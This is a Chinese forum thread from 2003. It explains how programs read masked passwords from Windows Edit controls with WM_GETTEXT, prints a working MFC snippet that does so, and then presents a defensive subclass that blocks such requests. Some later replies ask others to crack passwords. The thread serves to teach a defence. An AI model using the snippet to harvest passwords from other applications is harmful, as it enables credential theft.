团团 - 2003-5-4 14:52:00
一、非法获取Password的原理:
Edit控件是Windows的一个标准控件,当把其Password属性设为True时,就会将输入的内容屏蔽为星号,从而达到保护的目的。虽然我们看来都是星号,但程序中的Edit控件实际仍是用户输入的密码,应用程序可以获取该控件中的密码,其他应用程序也可以通过向其发送WM_GETTEXT或EM_GETLINE消息来获取Edit控件中的内容。黑客程序正是利用Edit控件的这
个特性,当发现当前探测的窗口是Edit控件并且具有ES_PASSWORD属性时,则通过SendMessage向此窗口发送WM_GETTEXT或EM_GETLINE消息,这样Edit框中的内容就一目了然了。
二、黑客软件工作方法
首先要取得当前的窗口,并判断是否是Edit控件,一般多通过鼠标来指定要探测的窗口,例如在WM_MOUSEMOVE消息的响应函数中进行判断,现列举代码片段如下:
file://将客户坐标转换成屏幕坐标
ClientToScreen(&point);
file://返回一个包含指定屏幕坐标点的窗口
CWnd* pWnd = CWnd::WindowFromPoint(point);
if (pWnd)
{
file://获取窗口句柄
HWND hwndCurr = pWnd->GetSafeHwnd();
if ((::GetWindowThreadProcessId (GetSafeHwnd(), NULL)) !=
(::GetWindowThreadProcessId (hwndCurr, NULL)))
{
char lpClassName[255];
file://获取类名
if (::GetClassName(hwndCurr, lpClassName, 255))
{
file://判断是否是Edit控件
if (0 == m_strWndClass.CompareNoCase("EDIT"))
{
file://获取窗口风格
LONG lStyle = ::GetWindowLong(hwndCurr, GWL_STYLE);
file://如果设置了ES_PASSWORD属性
if (lStyle & ES_PASSWORD)
{
char szText[255];
file://通过掌握的句柄hwndCurr向此控件发送WM_GETTEXT消息
::SendMessage(hwndCurr, WM_GETTEXT, 255, (LPARAM)szText);
file://密码已保存在szText中
m_strPassword = szText;
}
}
}
}
}
上述代码中值得注意的有以下几个关键地方:
ClientToScreen(&point);
CWnd* pWnd = CWnd::WindowFromPoint(point);
HWND hwndCurr = pWnd->GetSafeHwnd();
这三句代码可以获取当前鼠标位置所在窗口的窗口句柄,在SendMessage中要用到的。::SendMessage(hwndCurr, WM_GETTEXT, 255, (LPARAM)szText);
这便是真正起作用的SendMessage了,其第一个参数指定了要接收消息的窗口句柄,我们已经通过上面的代码获取到了,第二个参数就是让Edit控件返回字符的WM_GETTEXT消息了,并将得到的内容保存在szText中。
三、防范措施
既然我们搞清除了黑客软件普遍采取的手法,那我们自然能制订出一套防范其攻击的措施来。下面我们就要对Password进行保护。从以上分析我们可以看出:Edit控件的漏洞主要在于没有对发送WM_GETTEXT或EM_GETLINE消息者的身份进行检查,只要能找到Edit窗口句柄,任何进程都可获取其内容。所以必须要对发送消息者的身份进行验证,这里给出一种方法来验证发送消息者的身份是否合法:
1.创建新CEdit类
从CEdit继承一个子类CPasswordEdit,申明全局变量g_bSenderIdentity表明消息发送者的身份: BOOL g_bSenderIdentity;
然后响应CWnd的虚函数DefWindowProc,在这个回调函数中进行身份验证:
LRESULTCPasswordEdit:efWindowProc (UINTmessage,WPARAMwParam,LPARAMlParam)
{ file://对Edit的内容获取必须通过以下两个消息之一
if((message==WM_GETTEXT)
||(message==EM_GETLINE)) { file://检查是否为合法
if(!g_bSenderIdentity)
{
file://非法获取,显示信息
AfxMessageBox(_T ("报告:正在试图窃取密码!"));
return 0;
}
file://合法获取
g_bSenderIdentity=FALSE;
}
return CEdit:efWindowProc (message,wParam,lParam);
}
2.在数据输入对话框中做些处理
在对话框中申明一个类成员m_edtPassword:CpasswordEdit m_edtPassword;
然后在对话框的OnInitDialog()中加入下列代码: m_edtPassword.SubclassDlgItem(IDC_EDIT_PASSWORD,this);
将控制与新类做关联。之后要在对话框的数据交换函数中将身份设为合法: void CDlgInput:-ODataExchange (CDataExchange*pDX)
{ file://如果获取数据
file://注意:对于CPropertyPage类这里不需要if (pDX->m_bSaveAndValidate)条件
if(pDX->m_bSaveAndValidate)
{
g_bSenderIdentity=TRUE;
}
CDialog:-ODataExchange(pDX);
file://{{AFX_DATA_MAP(CDlgInput)
DDX_Text (pDX,IDC_EDIT_PASSWORD,m_sPassword); file://}}AFX_DATA_MAP
}
这样,Password输入框就拥有了合法身份,会受到保护。
结论:
以上的方法仅针对VC程序,对于其他语言如VB、Delphi等语言,需要借助VC做一个Password的ActiveX控件,实现方法与上述方法基本类似。以上程序均用VisualC++6.0编制调试通过。
-------------------
自从踏入这个无忧的小岛,幸运将永远地伴随着你!
我的部分文章来自互联网,若有侵权请告知。
该被帖于【2003-5-4 16:59:33】被【团团】修改
网事幽幽 - 2005-8-24 17:20:00
该用户帖子内容已被屏蔽
怪物125号 - 2005-8-24 22:34:00
约等于转帖
逍遥剑侠逸风 - 2005-8-28 12:11:00
看上去很深奥,不知道什么时候可以看得懂呢!》?
bobo无极限 - 2005-8-29 0:59:00
研究研究
粉红之恋 - 2005-8-29 10:53:00
挺好
支持
爱浪漫的win - 2005-8-30 20:20:00
是有点难懂
清风阁☆四少 - 2005-9-3 9:54:00
楼主很无私,支持你~~~~
三分多钱 - 2005-9-5 9:11:00
我是刚刚装的瑞星防火墙,可我一开启这个功能,我就不连接到服务器了,我用的是自动获得IP地址的网通宽带!我是不是防火墙设置的有问题的啊?????
高手们,帮帮我!!!谢谢啊!
curie-hu - 2005-9-7 18:37:00
好东西,先谢了!
菜鸟要飞 - 2005-10-8 16:17:00
能帮我弄到瑞星的 ID 么?
keiko - 2005-10-9 8:31:00
能否视频教下,看都看不懂
毒源 - 2005-10-10 20:47:00
学习,大家普遍知识水平提高了,普通黑客技术没有用了,要深造才行
逍遥王宫 - 2005-10-11 18:10:00
也太高深了,半懂状态....
永恒的光辉 - 2005-10-11 18:13:00
好!学习学习
小志远乖宝宝 - 2005-10-11 20:55:00
学习中
菜鸟的问题 - 2005-10-18 20:32:00
哎!什么也看不懂啊,还是满满学习吧
大漠孤烟直123 - 2005-10-22 15:35:00
好东西 阿
爱的宝宝 - 2005-10-22 19:39:00
ding !~
ukm7895123 - 2005-10-23 20:00:00
还行。
fly_ - 2005-10-25 16:29:00
这么老的东西还往上发?
fly_ - 2005-10-25 16:32:00
这么老的东西还往上发?
魔520神 - 2005-10-25 17:56:00
实在看不懂这是什么东东啊
哪里可以找到EDIT控件?
3306 - 2005-10-26 8:56:00
请问有哪一位高手会帮我破出密码呀?
3306 - 2005-10-26 9:00:00
高手,你会破计算机密码吗?帮我?
淚無影 - 2005-10-26 13:43:00
好像很麻煩,,,,
不是bu好 - 2005-10-28 2:22:00
[img]http://bbsimg.qq.com/2005/10/23/001/270.gif[img]
121316084 - 2006-2-4 11:46:00
很深奥 看不懂
© 2000 - 2026 Rising Corp. Ltd.